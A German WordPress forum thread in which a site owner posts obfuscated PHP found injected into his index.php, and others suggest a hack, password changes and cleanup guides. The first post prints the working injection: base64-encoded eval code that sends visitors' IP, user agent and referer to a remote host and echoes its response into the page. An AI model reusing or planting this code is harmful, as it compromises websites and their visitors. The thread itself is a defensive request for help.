1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Merkwürdiger Code in meiner index.php

Dieses Thema im Forum "Allgemeines" wurde erstellt von Max1000, 13. Oktober 2011.

  1. Max1000

    Max1000 Member

    Registriert seit:
    25. November 2009
    Beiträge:
    24
    Zustimmungen:
    0
    Hallo!

    Heute bekam ich eine Fehlermeldung aus meiner index.php.
    Der code in meiner index.php (der nicht von mir stammt und auch vorher da nicht war) - was ist das? Ich habe ihn gelöscht und alles läuft wieder prima. Gruß Max

    <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
     
  2. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Wenn Du den Code nicht eingefügt hast und dieser auch nicht von einem Plugin kommt, dann liegt der Verdacht nahe, dass sich irgendjemand an Deiner Seite vergriffen hat... Würde grundsätzlich mal die WP-, Plugin- und Themedateien nach weiterer solcher Codes durchstöbern. Ist zwar aufwändig, aber sicher ist sicher.

    Möglich, dass die Seite gehacked wurde. Sicherheitshalber auch mal alle PW ändern (DB, FTP, WP).
     
  3. Max1000

    Max1000 Member

    Registriert seit:
    25. November 2009
    Beiträge:
    24
    Zustimmungen:
    0
    Hi!

    Danke für die Antwort.
    Zuerst dachte ich, dass mit der Elemenierung der Codezeile in der index.php alles gut sei - war es aber nicht. Im Dashboard war die Hölle los. Ich musste die Seite also neu aufbauen.
    Ich werde nun einige Sicherheiststufen einbauen.

    Frage mich aber, wie man code verändern kann. Wie sind die in die Dateien gekommen???? Mein admin-Wort und das Paßwort waren nämlich kompliziert.


    Grüße

    Max
     
  4. MStemberg

    MStemberg Well-Known Member

    Registriert seit:
    25. Oktober 2010
    Beiträge:
    620
    Zustimmungen:
    0
    Ist BASE64 verschlüsselt.

    Das hier "Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85 Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+" ergibt

    Code:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    Und das "JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF 9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVy ZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWC k7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="

    Code:
    Entschuldige, aber du musst dich registrieren oder anmelden um den Inhalt sehen zu können!
    Damit findest Du dann bei Google Suche dieses Document:

    http://www.esotech.org/resources/cms/wordpress/wordpress-header-javascript-and-iframe-injection-problem-solution-and-analysis

    der das Problem (auf englisch) beschreibt und auch, wie man es löst.

    Viel Erfolg!
     
  5. Max1000

    Max1000 Member

    Registriert seit:
    25. November 2009
    Beiträge:
    24
    Zustimmungen:
    0
    Hi!

    danke für die Antwort und für die Lösung. Ich versteh das Problem - wie es bechrieben ist, schnalle aber nicht, was ich tun soll.

    Schon bei der ersten Zeile bin ich ratlos:

    The Solution

    Firstly, go to your main wordpress directory and type:
    # ls -al

    Was meint er damit? Wo soll ich das eingeben? Ich kenne solche Eingaben noch vom alten DOS. Aber wordpress liegt doch auf dem Server.
     
  6. Max1000

    Max1000 Member

    Registriert seit:
    25. November 2009
    Beiträge:
    24
    Zustimmungen:
    0
    Okay - habe hier eine deutsche Seite, die das Problem und die Lösung beschreibt. Die laden zuerst mal die gesamte WP auf den lokalen Rechner. Dann checken sie die Dateien.

    http://www.mynakedgirlfriend.de/malware-in-wordpress-blogs-bereinigen/

    Ich habe einen Mac und keine Ahnung, wie man die Anweisungen eingibt. Muss ich mal schauen - ist ja linux. Sollte nicht schwer sein.

    Vielen dank für den Tipp nochmal und Gruß

    Max
     
  7. Max1000

    Max1000 Member

    Registriert seit:
    25. November 2009
    Beiträge:
    24
    Zustimmungen:
    0
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden